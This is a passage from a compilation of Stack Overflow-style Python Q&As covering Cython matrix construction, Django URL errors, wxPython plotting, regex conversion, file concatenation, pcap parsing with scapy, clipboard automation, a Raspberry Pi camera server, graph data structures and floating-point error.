are ways to avoid it using pub/sub
[syncing](http://zguide.zeromq.org/page%3aall#Node-Coordination).
|
Efficient Cython for large matrix creation/manipulation
Question: I have been trying to speed up a section of code that creates and manipulates
a very large matrix of data (approx. 15,000 x 15,000; type double). For now, I
don't think the size of the matrix is that important because I do not see
speedup even for a small 10 x 10 matrix (in fact, the compiled cython code is
slower than pure python for small matrices, whereas the time is nearly
identical between cython and python for the large matrices). Please be patient
with me, as I have only been coding python for a week (newly converted from
Matlab) and I am only a humble chemical engineer.
The goal of the code is to take a 1D array (length L) as input, for a example:
[ 16.66 16.85 16.93 16.98 17.08 17.03 17.09 16.76 16.67 16.72]
And produce a matrix (height L, width L-1) as output:
[[ 16.66 16.85 16.93 16.98 17.08 17.03 17.09 16.76 16.67]
[ 16.85 16.93 16.98 17.08 17.03 17.09 16.76 16.67 16.72]
[ 16.93 16.98 17.08 17.03 17.09 16.76 16.67 16.72 0. ]
[ 16.98 17.08 17.03 17.09 16.76 16.67 16.72 0. 0. ]
[ 17.08 17.03 17.09 16.76 16.67 16.72 0. 0. 0. ]
[ 17.03 17.09 16.76 16.67 16.72 0. 0. 0. 0. ]
[ 17.09 16.76 16.67 16.72 0. 0. 0. 0. 0. ]
[ 16.76 16.67 16.72 0. 0. 0. 0. 0. 0. ]
[ 16.67 16.72 0. 0. 0. 0. 0. 0. 0. ]
[ 16.72 0. 0. 0. 0. 0. 0. 0. 0. ]]
I hope it is clear from the example above and from the code below what I am
trying to achieve. The algorithm needs to scale to very large matrices, which
it currently does without error, it's just slow!
Here is my cython code:
from scipy.sparse import spdiags
import numpy as np
cimport numpy as np
cimport cython
@cython.boundscheck(False)
@cython.wraparound(False)
def sfmat(np.ndarray[double, ndim=1] data):
cdef int h = data.shape[0]
cdef np.ndarray[double, ndim=2] m = np.zeros([h, h-1])
m = np.flipud(spdiags(np.tril(np.tile(data,[h-1,1]).T,0),range(1-h,1), h, h-1).todense())
return m
I also tried more verbose code, which may be more clear to read:
from scipy.sparse import spdiags
import numpy as np
cimport numpy as np
cimport cython
DTYPE = np.float
ctypedef np.float_t DTYPE_t
@cython.boundscheck(False)
@cython.wraparound(False)
def sfmat(np.ndarray[DTYPE_t, ndim=1] data):
assert data.dtype == DTYPE
cdef int h = data.shape[0]
cdef np.ndarray[DTYPE_t, ndim=2] m = np.zeros([h, h-1], dtype=DTYPE)
cdef np.ndarray[DTYPE_t, ndim=2] s1 = np.zeros([h, h-1], dtype=DTYPE)
cdef np.ndarray[DTYPE_t, ndim=2] s2 = np.zeros([h, h-1], dtype=DTYPE)
cdef np.ndarray[DTYPE_t, ndim=2] s3 = np.zeros([h, h-1], dtype=DTYPE)
s1 = np.tile(data,[h-1,1]).T
s2 = np.tril(s1,0)
s3 = spdiags(s2,range(1-h,1), h, h-1).todense()
m = np.flipud(s3)
return m
Any help with the cython implemenation would be very much appreciated. If
there is any other way to speed up this algorithm, that would help too. Thank
you for any help!
Because I am new to this, here are more details, which may or may not be
preventing me from speeding this up. I am running 64 bit Windows 7 Pro, and
compiling the cython code successfuly using the Windows SDK C/C++ compiler. (I
followed the directions on github
[here](https://github.com/cython/cython/wiki/64BitCythonExtensionsOnWindows)
with success). The simple "hello world" cython examples compile fine and run
fine in 64 bit mode, and the code above also compiles and runs with no errors.
For manipulation of the entire 15,000 x 15,000 matrix, 64bit architecture is
required, or at least I believe so, because running the code after compiling
for 32bit resulted in a memory error. For this question, please assume that
breaking up the matrix into smaller chunks is not possible. Please let me know
if there is any other information required to answer this question.
Cheers, scientistR
**UPDATE**
I thought that avoiding for loops would be the best approach, however, spdiags
is the main bottleneck. Thus, a new algorithm works better (4x improvement on
my computer):
import numpy as np
cimport numpy as np
cimport cython
@cython.boundscheck(False)
@cython.wraparound(False)
def sfmat(np.ndarray[double, ndim=1] data):
cdef int i
cdef np.ndarray[double, ndim=2] m = np.zeros([data.shape[0], data.shape[0]-1])
for i in range(data.shape[0]-1):
m[:,i] = np.roll(data,-i);
return m
But Cython does not offer any improvement over pure Python. Please help. As
the commentators have pointed out, there may not be a way to improve this,
besides a more optimizes algorithm, but I am hopeful. Thanks! Also, is there a
faster algorithm, cython or python?
Answer: This might be a bit of an old question, but no question should be left
unanswered `:)`. I was able to speed up your Cython code by about 8x by using
straightforward for-loops (which are actually fast in Cython), for array size
of 7000.. Note by the way that your implementation using `np.roll` does not
produce the array that you want (!), but I used that function to compare
timings with.
_Edited code to use Typed Memoryviews and`np.empty` instead of `np.zeros`_
def sfmat(double[:] data):
cdef int n = data.shape[0]
cdef np.ndarray[double, ndim=2] out = np.empty((n, n-1))
cdef double [:, :] out_v = out # "typed memoryview"
cdef int i, j
for i in range(n-1):
out_v[0, i] = data[i]
for i in range(1, n):
for j in range(n-i):
out_v[i, j] = data[i+j]
for j in range(n-i, n-1):
out_v[i, j] = 0.
return out
Unfortunately, the Cython effort is only ~1.2x faster than running the
following code in a regular Python session:
def sfmat(data):
n = len(data)
out = np.empty((n, n-1))
out[0, :] = data[:n-1]
for i in xrange(1, n):
out[i, :n-i] = data[i:]
out[i, n-i:] = 0
return out
However as already discussed in the comments, blowing up your original fairly
small matrix in this way is probably not the most efficient way to tackle your
actual, overall problem anyway. If all you wanted to do initially was avoid
using for-loops, in Cython there's simply no need to do that!
|
Django - No module name site.urls
Question: As [this other SO post
shows](http://stackoverflow.com/questions/11216829/django-directory-
structure), my Django 1.4 directory structure globally looks like:
wsgi/
champis/
settings.py
settings_deployment.py
urls.py
site/
static/
css/
app.css
templates/some_app/foo.html
__init__.py
urls.py
views.py
models.py
manage.py
The project is `champis`, the app is `site`. My _PYTHONPATH_ includes the
`wsgi` folder (well from Django standards it should be named after the project
i.e. `champis`, but here I'm starting from an
[Openshift](https://www.openshift.com/) [django-example Git
project](https://github.com/openshift/django-example)).
My `champis.urls`:
from django.conf.urls import patterns, include, url
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^champis/', include('site.urls')),
url(r'^admin/', include(admin.site.urls)),
)
My `site.urls` module then routes to specific pages, but when trying to access
on local, I have the error:
http://127.0.0.1/champis => no module name site.urls
The `site` app is present in my `INSTALLED_APPS`, and my `ROOT_URLCONF` is
`champis.urls`. Do you have an idea why ? Even moving the `site` folder into
the `champis` one didn't help.
Answer: I finally managed to solve this problem by:
* adding an `__init__.py` at project level
* renaming my `site` app into `web` (app name seemed to be colliding with... something that I did not find)
Here is my current directory structure now:
wsgi/
champis/
settings.py
settings_deployment.py
urls.py
web/ <= changed app name
static/
css/
app.css
templates/some_app/foo.html
__init__.py
urls.py
views.py
models.py
manage.py
__init__.py <= added
|
Plot figure problems with python and matplotlib
Question: I'm making an app that plots a figure after some processing. This is done
after the user has introduced some values and pushes a button. However I don't
get the figure plotted. Below there is a simplified code. This works fine if I
plot directly the values of t and s, but not if it is done after pushing the
button. What am I missing? Is there another better way to do so?
from numpy import arange, sin, pi
import matplotlib
matplotlib.use('WXAgg')
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas
from matplotlib.backends.backend_wx import NavigationToolbar2Wx
from matplotlib.figure import Figure
import wx
class Input_Panel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
# Input variables
self.button = wx.Button(self, label="Go")
# Set sizer for the panel content
self.sizer = wx.GridBagSizer(1, 1)
self.sizer.Add(self.button, (1, 2), (3, 6), flag=wx.EXPAND)
self.SetSizer(self.sizer)
class Output_Panel_Var(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
# Output variables
self.tittle = wx.StaticText(self, label="OUTPUTS:")
self.font = wx.Font(12, wx.DECORATIVE, wx.BOLD, wx.NORMAL)
self.tittle.SetFont(self.font)
self.lblt = wx.StaticText(self, label="t:")
self.resultt = wx.StaticText(self, label="", size=(100, -1))
self.lbls = wx.StaticText(self, label="s:")
self.results = wx.StaticText(self, label="", size=(100, -1))
# Set sizer for the panel content
self.sizer = wx.GridBagSizer(2, 2)
self.sizer.Add(self.tittle, (1, 3))
self.sizer.Add(self.lblt, (3, 1))
self.sizer.Add(self.resultt, (3, 2))
self.sizer.Add(self.lbls, (4, 1))
self.sizer.Add(self.results, (4, 2))
self.SetSizer(self.sizer)
class Output_Panel_Fig(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
self.figure = Figure()
self.axes = self.figure.add_subplot(111)
self.canvas = FigureCanvas(self, -1, self.figure)
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.sizer.Add(self.canvas, 1, wx.LEFT | wx.TOP | wx.GROW)
self.SetSizer(self.sizer)
def draw(self,t,s):
self.axes.plot(t, s)
class Main_Window(wx.Frame):
def __init__(self, parent, title):
wx.Frame.__init__(self, parent, title = title, pos = (0, 0), size = wx.DisplaySize())
# Set variable panels
self.main_splitter = wx.SplitterWindow(self)
self.out_splitter = wx.SplitterWindow(self.main_splitter)
self.inputpanel = Input_Panel(self.main_splitter)
self.inputpanel.SetBackgroundColour('#c4c4ff')
self.outputpanelvar = Output_Panel_Var(self.out_splitter)
self.outputpanelvar.SetBackgroundColour('#c2f1f5')
self.outputpanelfig = Output_Panel_Fig(self.out_splitter)
self.main_splitter.SplitVertically(self.inputpanel, self.out_splitter)
self.out_splitter.SplitHorizontally(self.outputpanelvar, self.outputpanelfig)
# Set event handlers
self.inputpanel.button.Bind(wx.EVT_BUTTON, self.OnButton)
def OnButton(self, e):
t = arange(0.0, 1.0, 0.01)
s = sin(2 * pi * t)
#self.outputpanelvar.resultt.SetLabel('%.5f' % t)
#self.outputpanelvar.resultt.SetLabel('%.5f' % s)
self.outputpanelfig.draw(t,s)
def main():
app = wx.App(False)
frame = Main_Window(None, "T-Matrix Codes GUI")
frame.Show()
app.MainLoop()
if __name__ == "__main__" :
main()
Answer: I think you are missing a redraw of the canvas. It is not enough to do a new
plot but a refresh of the drawing pane must be done! Add a self.canvas.draw()
after your plot command in the draw method of the Output_Panel_Fig this should
help.
import ...
class Input_Panel(wx.Panel):
def __init__(self, parent):
...
class Output_Panel_Var(wx.Panel):
def __init__(self, parent):
...
class Output_Panel_Fig(wx.Panel):
def __init__(self, parent):
...
def draw(self,t,s):
self.axes.plot(t, s)
self.canvas.draw()
class Main_Window(wx.Frame):
def __init__(self, parent, title):
...
def OnButton(self, e):
...
def main():
...
if __name__ == "__main__" :
main()
|
Python regex and using s/ in pattern
Question: I have this regex pattern that when I use in vim works great:
s/\.[A-Za-z0-9_]*\(IPROC\|IFIX\|IPTAT\)[A-Za-z_]*\([0-9][0-9]*\)[^0-9]*.*([A-Za-z0-9_]*\(IPROC\|IFIX\|IPTAT\)[A-Za-z_]*\([0-9][0-9]*\)[^0-9]*.*)/\3_\4
I am searching for things like
`.jalsdkjflkajsdf_lajsdlfIFIX_100(IFIX_asdf_200)`
It will return: `IFIX_200` (the last part). I can also set it to return
buffers 1 and 2 so I can get `IFIX_100` (the first part).
How can I use this reg expression in python to return what is expected. I've
tried each of the re.findall and re.search, and no luck.
patternI1 = 's/\.[A-Za-z0-9_]*\(IPROC|IFIX|IPTAT\)[A-Za-z_]*\([0-9][0-9]*\)[^0-9]*.*([A-Za-z0-9_]*\(IPROC|IFIX|IPTAT\)[A-Za-z_]*\([0-9][0-9]*\)[^0-9]*.*)/\3_\4'
with open(filename) as input_file:
for num, line in enumerate(input_file, 1):
if re.search(patternI1, line):
x = re.findall(patternI1, line)
print x
Answer: Leave of the `s/ ... /3_4`; that's Vim search-and-replace syntax. Vim also
uses metacharacters differently, do _not_ escape the `(..)` parenthesis of a
group, but _do_ escape literal `()` parenthesis.
`\w` is a nice shortcut for `[A-Za-z0-9_]`, and `\d` will do for `[0-9]`, `\D`
for `[^0-9]`, using `\d+` where `\d\d*` was used:
patternI1 = r'\.\w*(IPROC|IFIX|IPTAT)\w*?(\d+)\D*.*\(\w*(IPROC|IFIX|IPTAT)\w*?(\d+)\D*.*\)'
I've adjusted the greedyness of the `\w*` pattern before the digits groups to
prevent these from swallowing too many digits too. Demo:
>>> import re
>>> sample = '.jalsdkjflkajsdf_lajsdlfIFIX_100(IFIX_asdf_200)'
>>> patternI1 = r'\.\w*(IPROC|IFIX|IPTAT)\w*?(\d\d*)\D*.*\(\w*(IPROC|IFIX|IPTAT)\w*?(\d\d*)\D*.*\)'
>>> re.search(patternI1, sample).groups()
('IFIX', '100', 'IFIX', '200')
|
How do I combine two files without overwriting any data in python?
Question: I need to concatenate two files, one which contains a single number and the
other which contains at least two rows of data. I have tried
shutil.copyfile(file2,file1) and subprocess.call("cat " + file2 + " >> " +
file1, shell=True), both things give me the same result. The file with the
single number contains an integer and a newline (i.e. two characters) so when
I bring the two files together the first two characters of file2 are
overwritten instead of just added to the end. If I do it through the shell
using "cat file2 >> file1" this does not happen and it works perfectly.
Here is what I mean:
import numpy as np
from subprocess import call
f.open(file1)
f.write('2\n')
np.savetxt(file2,datafile,fmt)
call("cat " + file2 " >> " + file1, shell=True)
So instead of getting:
2
data data data ...
data data data ...
I get:
2
ta data data ...
data data data ...
I have no idea what is causing this issue but it is very frustrating. Any
suggestions?
Answer: Have you tried closing `file1` first?
f.close()
np.savetxt... Etc
|
How to parse Ethernet Header of pcap file using Python?
Question: I would like to decode the link-layer type and version of packets in a pcap
file using Python. So, I have to parse pcap using Python. Here is my code.
import dpkt
import socket
import sys
f = open('filename')
pcap = dpkt.pcap.Reader(f)
for ts, buf in pcap:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
tcp = ip.data
print ts, len(buf)
print eth
print ip
print tcp
f.close()
Answer: The [dpkt](https://code.google.com/p/dpkt/) python library is maybe not the
best tools for this task, according to their website dpkt is best used for:
> fast, simple packet creation / parsing, with definitions for the basic
> TCP/IP protocols.
Use instead scapy which is a
> powerful interactive packet manipulation program for Python.
You can use a script like this
from scapy.all import *
packets = rdpcap('tmp.pcap')
for p in packets:
(p/Ether()).show()
Read [Infinite possibilities with Python's Scapy
Module](http://bt3gl.github.io/infinite-possibilities-with-pythons-scapy-
module.html) for more details.
|
Sending Strings Queue to Clipboard in python
Question: I am writing a program that runs in background and check's for file changes in
a folder if any new Image file arrives into that folder it will read text from
that Image with the help of tesseract OCR Engine.Images contains Adresses of
Employees.python program splits that Adress into individual list.
I want to put each address section into clipboard one after other.So If I
press Ctrl+V First Section will pasted.Next time if i press Ctrl+v Next
section will pasted like wise.
Here is the Code.
#!/usr/bin/python
import commands,os
global vdir,outfile
global prev
vdir="Vilvin"
out="Output"
a=os.listdir(vdir)
prev=len(a)
whcount=0
stat_dict={'NEW HRMPSHIRE': 'NEW HAMPSHIRE', 'VERMONT': 'VERMONT', 'LOUISIRNR': 'LOUISIANA', 'CRLIFORNIR': 'CALIFORNIA', 'MISSISSIPPI': 'MISSISSIPPI', 'PENNSYLVRNIR': 'PENNSYLVANIA', 'MONTRNR': 'MONTANA', 'GEORGIR': 'GEORGIA', 'WRSHINGTON': 'WASHINGTON', 'NEW YORK': 'NEW YORK', 'MRRYLRND': 'MARYLAND', 'IOWR': 'IOWA', 'SOUTH DRKOTR': 'SOUTH DAKOTA', 'VIRGINIR': 'VIRGINIA', 'FLORIDR': 'FLORIDA', 'MRINE': 'MAINE', 'NEBRRSKR': 'NEBRASKA', 'RLRSKR': 'ALASKA', 'ILLINOIS': 'ILLINOIS', 'CONNECTICUT': 'CONNECTICUT', 'TENNESSEE': 'TENNESSEE', 'NEW MEXICO': 'NEW MEXICO', 'COLORRDO': 'COLORADO', 'DELRWRRE': 'DELAWARE', 'HRWRII': 'HAWAII', 'NORTH CRROLINR': 'NORTH CAROLINA', 'UTRH': 'UTAH', 'RLRBRMR': 'ALABAMA', 'MICHIGRN': 'MICHIGAN', 'RRKRNSRS': 'ARKANSAS', 'NEW JERSEY': 'NEW JERSEY', 'MISSOURI': 'MISSOURI', 'OREGON': 'OREGON', 'WYOMING': 'WYOMING', 'OHIO': 'OHIO', 'WISCONSIN': 'WISCONSIN', 'MINNESOTR': 'MINNESOTA', 'KRNSRS': 'KANSAS', 'RHODE ISLRND': 'RHODE ISLAND', 'WEST VIRGINIR': 'WEST VIRGINIA', 'IDRHO': 'IDAHO', 'OKLRHOMR': 'OKLAHOMA', 'KENTUCKY': 'KENTUCKY', 'RRIZONR': 'ARIZONA', 'NEVRDR': 'NEVADA', 'INDIRNR': 'INDIANA', 'MRSSRCHUSETTS': 'MASSACHUSETTS', 'SOUTH CRROLINR': 'SOUTH CAROLINA', 'NORTH DRKOTR': 'NORTH DAKOTA', 'TEXRS': 'TEXAS'}
while True:
instant=os.listdir(vdir)
if(len(instant)>prev):
print "File Change Detected...."
r=commands.getoutput('ls -ct1 '+vdir+' | head -1')
print "Most recent file = %s " %(r)
r=r.replace("(","\(")
r=r.replace(")","\)")
r=r.replace(" ","\ ")
os.system("tesseract "+vdir+"/"+r+" "+out+"/"+"Output")
result=commands.getoutput("awk -F: '{ print $2 $3 }' "+out+"/"+"Output.txt")
res=result.split("\n")
state=res[0].split("State")
profile=res[1].split("Pro?ile")
applicant=state[0].strip().replace("R","A")
state=state[1].strip()
state=stat_dict[state]
sid=profile[0].strip()
profile=profile[1].strip().replace("R","A")
sec=res[3].strip().replace("R","A")
a=commands.getoutput("echo \""+applicant+"\" | xclip -verbose -selection clipboard")
b=commands.getoutput("echo \""+state+"\" | xclip -verbose -selection clipboard")
c=commands.getoutput("echo \""+sid+"\" | xclip -verbose -selection clipboard")
d=commands.getoutput("echo \""+profile+"\" | xclip -verbose -selection clipboard")
e=commands.getoutput("echo \""+sec+"\" | xclip -verbose -selection clipboard")
print "Applicant : "+applicant+"\nState : "+state+"\nStaff ID : "+sid+"\nProfile : "+profile+"\nSEC : "+sec+"\n"
prev=len(instant)
else:
whcount=whcount+1
print "While Loop Count : "+str(whcount)+"\n"
os.system("sleep 2")
One thing I forgot is this program always runs in background & the terminal
windows is minimised so we have to get Key presses on whole Xsession & GUI
Apps..whenever Ctrl+V triggered in any application we should detect that
...Thanks in Advance
Answer: Ok, so, here is how this goes:
import time,os,win32api
from msvcrt import getch
def addToClipBoard(text):
command = 'echo ' + text.strip() + '| clip'
os.system(command)
def testpress(key):
return (win32api.GetKeyState(key) & (1 << 7)) != 0
key = 17 #ctrl key
key2= ord('V')
copy=1
while True:
keydown = testpress(key)
key2down = testpress(key2)
if keydown and key2down:
print 'CtrlV pressed!'
if copy==1:
addToClipBoard('Foo')
elif copy==2:
addToClipBoard('Shoo')
elif copy==3:
addToClipBoard('THA END')
if copy>3:
exit(1)
copy+=1
time.sleep(0.10)
I got the code for testing the keypress using win32api from another answer,
then put it all together to do what you wanted it to :)
|
Run server alongside infinite loop in Python
Question: I have the following code:
#!/usr/bin/python
import StringIO
import subprocess
import os
import time
from datetime import datetime
from PIL import Image
# Original code written by brainflakes and modified to exit
# image scanning for loop as soon as the sensitivity value is exceeded.
# this can speed taking of larger photo if motion detected early in scan
# Motion detection settings:
# need future changes to read values dynamically via command line parameter or xml file
# --------------------------
# Threshold - (how much a pixel has to change by to be marked as "changed")
# Sensitivity - (how many changed pixels before capturing an image) needs to be higher if noisy view
# ForceCapture - (whether to force an image to be captured every forceCaptureTime seconds)
# filepath - location of folder to save photos
# filenamePrefix - string that prefixes the file name for easier identification of files.
threshold = 10
sensitivity = 180
forceCapture = True
forceCaptureTime = 60 * 60 # Once an hour
filepath = "/home/pi/camera"
filenamePrefix = "capture"
# File photo size settings
saveWidth = 1280
saveHeight = 960
diskSpaceToReserve = 40 * 1024 * 1024 # Keep 40 mb free on disk
# Capture a small test image (for motion detection)
def captureTestImage():
command = "raspistill -w %s -h %s -t 500 -e bmp -o -" % (100, 75)
imageData = StringIO.StringIO()
imageData.write(subprocess.check_output(command, shell=True))
imageData.seek(0)
im = Image.open(imageData)
buffer = im.load()
imageData.close()
return im, buffer
# Save a full size image to disk
def saveImage(width, height, diskSpaceToReserve):
keepDiskSpaceFree(diskSpaceToReserve)
time = datetime.now()
filename = filepath + "/" + filenamePrefix + "-%04d%02d%02d-%02d%02d%02d.jpg" % ( time.year, time.month, time.day, time.hour, time.minute, time.second)
subprocess.call("raspistill -w 1296 -h 972 -t 1000 -e jpg -q 15 -o %s" % filename, shell=True)
print "Captured %s" % filename
# Keep free space above given level
def keepDiskSpaceFree(bytesToReserve):
if (getFreeSpace() < bytesToReserve):
for filename in sorted(os.listdir(filepath + "/")):
if filename.startswith(filenamePrefix) and filename.endswith(".jpg"):
os.remove(filepath + "/" + filename)
print "Deleted %s to avoid filling disk" % filename
if (getFreeSpace() > bytesToReserve):
return
# Get available disk space
def getFreeSpace():
st = os.statvfs(".")
du = st.f_bavail * st.f_frsize
return du
# Get first image
image1, buffer1 = captureTestImage()
# Reset last capture time
lastCapture = time.time()
# added this to give visual feedback of camera motion capture activity. Can be removed as required
os.system('clear')
print " Motion Detection Started"
print " ------------------------"
print "Pixel Threshold (How much) = " + str(threshold)
print "Sensitivity (changed Pixels) = " + str(sensitivity)
print "File Path for Image Save = " + filepath
print "---------- Motion Capture File Activity --------------"
while (True):
# Get comparison image
image2, buffer2 = captureTestImage()
# Count changed pixels
changedPixels = 0
for x in xrange(0, 100):
# Scan one line of image then check sensitivity for movement
for y in xrange(0, 75):
# Just check green channel as it's the highest quality channel
pixdiff = abs(buffer1[x,y][1] - buffer2[x,y][1])
if pixdiff > threshold:
changedPixels += 1
# Changed logic - If movement sensitivity exceeded then
# Save image and Exit before full image scan complete
if changedPixels > sensitivity:
lastCapture = time.time()
saveImage(saveWidth, saveHeight, diskSpaceToReserve)
break
continue
# Check force capture
if forceCapture:
if time.time() - lastCapture > forceCaptureTime:
changedPixels = sensitivity + 1
# Swap comparison buffers
image1 = image2
buffer1 = buffer2
This code takes a picture once movement is detected, and keeps doing so until
I manually stop it. (I should mention that the code is for use with the
Raspberry Pi computer)
I also have the following code courtesy of Nathan Jhaveri here on
Stackoverflow:
import SocketServer
from BaseHTTPServer import BaseHTTPRequestHandler
def some_function():
print "some_function got called"
class MyHandler(BaseHTTPRequestHandler):
def do_GET(self):
if self.path == '/captureImage':
saveImage(saveWidth, saveHeight, diskSpaceToReserve)
self.send_response(200)
httpd = SocketServer.TCPServer(("", 8080), MyHandler)
httpd.serve_forever()
This code runs a simple server that would execute the
saveImage(saveWidth, saveHeight, diskSpaceToReserve)
function when the url /captureImage is visited on the server. I have run into
a problem with this though. Since the two pieces of code are both infinite
loops, they cannot run side by side. I would assume I need to do some kind of
multi-threading, but that is something I have never experimented with in
Python before. I would appreciate if anyone could help me get back on track
with this.
Answer: This isn't a small question. Your best bet is to work through some python
threading tutorials such as this one:
<http://www.tutorialspoint.com/python/python_multithreading.htm> (found via
google)
|
Representing graphs (data structure) in Python
Question: How can one neatly represent a
[graph](https://en.wikipedia.org/wiki/Graph_%28data_structure%29) in
[Python](https://en.wikipedia.org/wiki/Python_\(programming_language\))?
(Starting from scratch i.e. no libraries!)
What data structure (e.g. dicts/tuples/dict(tuples)) will be fast but also
memory efficient?
One must be able to do various graph
[operations](https://en.wikipedia.org/wiki/Graph_%28data_structure%29#Operations)
on it.
As pointed out, the various [graph
representations](https://en.wikipedia.org/wiki/Graph_\(abstract_data_type\)#Representations)
might help. How does one go about implementing them in Python?
As for the libraries, [this
question](http://stackoverflow.com/questions/606516/python-graph-library) has
quite good answers.
Thanks!
Answer: Even though this is a somewhat old question, I thought I'd give a practical
answer for anyone stumbling across this.
Let's say you get your input data for your connections as a list of tuples
like so:
[('A', 'B'), ('B', 'C'), ('B', 'D'), ('C', 'D'), ('E', 'F'), ('F', 'C')]
The data structure I've found to be most useful and efficient for graphs in
Python is a **dict of sets**. This will be the underlying structure for our
`Graph` class. You also have to know if these connections are arcs (directed,
connect one way) or edges (undirected, connect both ways). We'll handle that
by adding a `directed` parameter to the `Graph.__init__` method. We'll also
add some other helpful methods.
from collections import defaultdict
class Graph(object):
""" Graph data structure, undirected by default. """
def __init__(self, connections, directed=False):
self._graph = defaultdict(set)
self._directed = directed
self.add_connections(connections)
def add_connections(self, connections):
""" Add connections (list of tuple pairs) to graph """
for node1, node2 in connections:
self.add(node1, node2)
def add(self, node1, node2):
""" Add connection between node1 and node2 """
self._graph[node1].add(node2)
if not self._directed:
self._graph[node2].add(node1)
def remove(self, node):
""" Remove all references to node """
for n, cxns in self._graph.iteritems():
try:
cxns.remove(node)
except KeyError:
pass
try:
del self._graph[node]
except KeyError:
pass
def is_connected(self, node1, node2):
""" Is node1 directly connected to node2 """
return node1 in self._graph and node2 in self._graph[node1]
def find_path(self, node1, node2, path=[]):
""" Find any path between node1 and node2 (may not be shortest) """
path = path + [node1]
if node1 == node2:
return path
if node1 not in self._graph:
return None
for node in self._graph[node1]:
if node not in path:
new_path = self.find_path(node, node2, path)
if new_path:
return new_path
return None
def __str__(self):
return '{}({})'.format(self.__class__.__name__, dict(self._graph))
I'll leave it as an "exercise for the reader" to create a `find_shortest_path`
and other methods.
Let's see this in action though...
>>> connections = [('A', 'B'), ('B', 'C'), ('B', 'D'),
('C', 'D'), ('E', 'F'), ('F', 'C')]
>>> g = Graph(connections, directed=True)
>>> pprint(g._graph)
{'A': {'B'},
'B': {'D', 'C'},
'C': {'D'},
'E': {'F'},
'F': {'C'}}
>>> g = Graph(connections) # undirected
>>> pprint(g._graph)
{'A': {'B'},
'B': {'D', 'A', 'C'},
'C': {'D', 'F', 'B'},
'D': {'C', 'B'},
'E': {'F'},
'F': {'E', 'C'}}
>>> g.add('E', 'D')
>>> pprint(g._graph)
{'A': {'B'},
'B': {'D', 'A', 'C'},
'C': {'D', 'F', 'B'},
'D': {'C', 'E', 'B'},
'E': {'D', 'F'},
'F': {'E', 'C'}}
>>> g.remove('A')
>>> pprint(g._graph)
{'B': {'D', 'C'},
'C': {'D', 'F', 'B'},
'D': {'C', 'E', 'B'},
'E': {'D', 'F'},
'F': {'E', 'C'}}
>>> g.add('G', 'B')
>>> pprint(g._graph)
{'B': {'D', 'G', 'C'},
'C': {'D', 'F', 'B'},
'D': {'C', 'E', 'B'},
'E': {'D', 'F'},
'F': {'E', 'C'},
'G': {'B'}}
>>> g.find_path('G', 'E')
['G', 'B', 'D', 'C', 'F', 'E']
|
WxPython widget missplaced after hide() & show()
Question: I'm trying to build a GUI for a school project for Boolean expressions
evaluation. This program takes a string as an input `A^B` and shows it's truth
table in the GUI with a Grid widget.
For some reasons (don't want to make this post too long) I need to Hide() and
Show() a panel with the only widget it has (the grid) but whenever I call
Hide() and Show() the panel is placed on the top-left corner of the parent
panel.
Let me clarify using some pictures:
The panel that I want to hide is the gray one just below the disabled TextCtrl
widget and, as you can see, I placed it where I wanted to. Now let's see after
hide() and show()

Now the panel has been moved to the upper left corner of the screen.
This is how I'm implementing the panel:
#Answer box panel
self.panel_resp = sp.ScrolledPanel(midPan, -1) # midpan is the parent panel (blue)
self.panel_resp.SetBackgroundColour('#FFFFFFF')
resp_sizer = wx.BoxSizer(wx.HORIZONTAL)
self.panel_resp.SetSizer(resp_sizer)
self.panel_resp.SetAutoLayout(1)
self.panel_resp.SetupScrolling()
self.vbox1.Add(self.panel_resp, flag=wx.EXPAND|wx.ALL,
border=10)
self.vbox1.Add((-1,10))
self.panel_resp.Hide()
Now, whenever I click the 'Evaluar' button, I make the following statement:
`self.panel_resp.Show()`
And the panel shows up in that corner.
Any idea on why is this happening?
I didn't want to fill this post with my code since it's quite huge but I'll
gladly answer any questions about it, I just posted that part since I think
that's the only important one.
Answer: I think Show() just makes hidden components visible. Assuming self.vbox1 is
the sizer for midpan, try doing a `self.vbox1.Layout()` manually to tell it to
move everything to the right spot manually.
|
Enthought Canopy - passing sys.argv from PySide Qt program
Question: I've recently been looking at the Enthought distro of iPython. Today I decided
to see if I could get some Qt GUI progs running and was successful after
making minor changes. Simple example:
import sys
from PySide import QtGui # was 'from PyQT4 import QtGui'
# app = QtGui.QApplication(sys.argv) -- not needed
win = QtGui.QWidget()
win.resize(320, 240)
win.setWindowTitle("Hello MIT 6X!")
win.show()
sys.exit() # was 'sys.exit(app.exec_())'
But I would like to be able to pass `sys.argv` in some cases. Most example
code I see is in the form of the commented out `'app = '` line above. If I
include it, I get
> 'RuntimeError: A QApplication instance already exists.'
Suggestions for passing arguments appreciated.
Answer: Two separate issues:
1) Passing command line arguments: As you have probably noticed, when you do
the "Run" command from the Canopy editor, all it does is issue the IPython
%run magic command. You can type the same command in the IPython shell, plus
command line parameters, which your program will see. Or to save keystrokes,
do this auto-generated Run command once, then press Up Arrow in the IPython
shell to recall that auto-generated %run command, then enter your parameters
after the filename, and then press Enter. You'll end up with an IPython magic
command like this:
%run pathtoprog/myprogrampy p1 p2 p3
We (Enthought) are considering adding a setting for command-line parameters so
that you could do "Run with parameters" and have the best of both worlds.
2) Existing QApplication: By default, Canopy's IPython is running in IPython's
interactive Pylab mode, with a Qt backend. If you don't want this, you can
just disable Pylab mode in the Canopy Preferences/Python menu, or change the
Pylab mode to Inline (for matplotlib) instead of Interactive.
For maximum flexibility, with a bit more work, you could (as matplotlib does)
introduce logic which checks whether a QApplication already exists, use it if
it exists and create it if it does not.
|
How to avoid floating point errors?
Question: I was trying to write a function to approximate square roots (I know there's
the math module...I want to do it myself), and I was getting screwed over by
the floating point arithmetic. How can you avoid that?
def sqrt(num):
root = 0.0
while root * root < num:
root += 0.01
return root
Using this has these results:
>>> sqrt(4)
2.0000000000000013
>>> sqrt(9)
3.00999999999998
I realize I could just use `round()`, but I want to be able to make this
really accurate. I want to be able to calculate out to 6 or 7 digits. That
wouldn't be possible if I'm rounding. I want to understand how to properly
handle floating point calculations in Python.
Answer: This really has nothing to do with Python - you'd see the same behavior in any
language using your hardware's binary floating-point arithmetic. First [read
the docs](http://docs.python.org/2/tutorial/floatingpoint.html).
